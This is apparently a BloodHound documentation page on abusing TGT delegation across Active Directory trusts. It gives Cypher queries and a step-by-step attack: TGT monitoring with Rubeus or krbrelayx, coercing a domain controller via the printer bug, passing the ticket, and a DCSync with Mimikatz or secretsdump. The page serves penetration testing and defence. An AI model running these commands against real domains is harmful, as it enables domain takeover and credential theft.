> ## Documentation Index
> Fetch the complete documentation index at: https://bloodhound.specterops.io/llms.txt
> Use this file to discover all available pages before exploring further.

# AbuseTGTDelegation

> The trust from the target node domain to the source node domain has TGT delegation enabled. When a resource in the source node domain is configured with unconstrained delegation, principals from the target node domain will automatically forward their Ticket Granting Ticket (TGT) to that resource upon access.

<img noZoom src="https://mintcdn.com/specterops/tTIczgde9H07oLXf/assets/enterprise-AND-community-edition-pill-tag.svg?fit=max&auto=format&n=tTIczgde9H07oLXf&q=85&s=ad49a576589f4d2a8081df77d07fdf56" alt="Applies to BloodHound Enterprise and CE" width="482" height="45" data-path="assets/enterprise-AND-community-edition-pill-tag.svg" />

## Abuse Info

TGT delegation allows an attacker to capture TGTs of privileged users or computers in the target domain when they authenticate against a system configured with unconstrained delegation.

A common attack method involves the attacker logging into a DC of the source domain and coercing a DC of the target domain. Since DCs have unconstrained delegation enabled by default, this grants the attacker a TGT for a target domain DC, which can then be used to perform a DCSync attack on the target domain. This guide details that version of the attack.

Alternatively, attackers can target other privileged computers or users besides DCs.

The attack will fail if the target is a member of Protected Users or is marked as not trusted for delegation, as their TGTs will not be sent to hosts with unconstrained delegation. You can identify all protected principals using the following Cypher query in BloodHound:

```cypher theme={null}
MATCH (g:Group)
WHERE g.objectid ENDS WITH "-525"
MATCH (n:Base)
WHERE n.sensitive = TRUE OR (n)-[:MemberOf*..]->(g)
RETURN n
LIMIT 1000
```

Attackers can also exploit non-DC hosts or users in the source domain with unconstrained delegation enabled. To find all non-DC principals with unconstrained delegation in BloodHound, run:

```cypher theme={null}
MATCH (n:Base)
WHERE n.unconstraineddelegation = TRUE AND NOT (n)-[:DCFor]->()
RETURN n
```

## Attack

**Step 1: Start Monitoring for TGTs**

Windows:

Log into a DC of the source domain and open a command prompt as Administrator.

Start monitoring for incoming TGTs using Rubeus:

```bash theme={null}
Rubeus.exe request monitor /user:targetdc.domain.local /interval:5 /nowrap
```

Linux:

Obtain credentials for a computer or user with unconstrained delegation.

Start monitoring for incoming TGTs using krbrelayx.py with the credentials of the unconstrained delegation account:

```bash theme={null}
krbrelayx.py -aesKey 9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab
```

**Step 2: Coerce the Target DC**

The printer bug is abused in this example. If the Print Spooler service is disabled on the target host, alternative coercion techniques must be used. See "Windows Coerced Authentication Methods" under References for details.

To coerce the target DC, Authenticated Users access is required in the target domain. If the trust relationship is bidirectional, all principals in the source domain have this access by default. If not, coercion must be executed as a principal from the target forest. Attackers can obtain such a session using the trust account attack. See "SID Filter as a Security Boundary Between Domains? (Part 7) - Trust Account Attack" under References for details.

Windows:

From any host in the domain, coerce the target DC using SpoolSample:

```bash theme={null}
SpoolSample.exe targetdc.domain.local compromiseddc.otherdomain.local
```

Rubeus will print the DC TGT as soon as it is received.

Linux:

Coerce the target DC using printerbug.py:

```bash theme={null}
printerbug.py '<domain>/<username>:<password>'@<target DC IP> <compromised DC IP>
```

krbrelayx.py will save the received TGT to disk.

**Step 3: Pass the Ticket**

Windows:

Inject the DC TGT into memory using Rubeus:

```bash theme={null}
Rubeus.exe ptt /ticket:doIFvjCCBbqgAwI...
```

Linux:

Set the KRB5CCNAME environment variable to the ticket's path:

```bash theme={null}
export KRB5CCNAME=$path_to_ticket.ccache
```

**Step 4: DCSync the Target Domain**

Windows:

Use Mimikatz to DCSync the target domain from the machine where the DC TGT was injected:

```bash theme={null}
lsadump::dcsync /domain:domain.local /user:DOMAIN\Administrator
```

Linux:

Use secretsdump.py to DCSync the target domain:

```bash theme={null}
secretsdump.py -k -just-dc-user <DOMAIN/targetuser> <target DC DNS name>
```

## Opsec Considerations

The attack can be detected by correlating Windows security events from the attacker-controlled host and the target. See the reference "Hunting in Active Directory: Unconstrained Delegation & Forests Trusts" for details.

## Edge Schema

Source: [Domain](/resources/nodes/domain)\
Destination: [Domain](/resources/nodes/domain)\
Traversable: **Yes**

## References

* [Not A Security Boundary: Breaking Forest Trusts](https://specterops.io/blog/2018/11/28/not-a-security-boundary-breaking-forest-trusts/)
* [Hunting in Active Directory: Unconstrained Delegation & Forests Trusts](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1)
* [Abusing Users Configured with Unconstrained Delegation](https://exploit.ph/user-constrained-delegation.html)
* [SID filter as security boundary between domains? (Part 7) - Trust account attack - from trusting to trusted](https://blog.improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-7-trust-account-attack-from-trusting-to-trusted)
* [“Relaying” Kerberos - Having fun with unconstrained delegation](https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/)
* [Windows Coerced Authentication Methods](https://github.com/p0dalirius/windows-coerced-authentication-methods)
* [Rubeus](https://github.com/GhostPack/Rubeus)
* [SpoolSample](https://github.com/leechristensen/SpoolSample)
* [mimikatz](https://github.com/gentilkiwi/mimikatz)
* [krbrelayx.py](https://github.com/dirkjanm/krbrelayx/)
* [printerbug.py](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py)
* [secretsdump.py](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py)
* [Updates to TGT delegation across incoming trusts in Windows Server](https://support.microsoft.com/en-us/topic/updates-to-tgt-delegation-across-incoming-trusts-in-windows-server-1a6632ac-1599-0a7c-550a-a754796c291e)
* [Microsoft AD Trust Technical Documentation](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc755321\(v=ws.10\))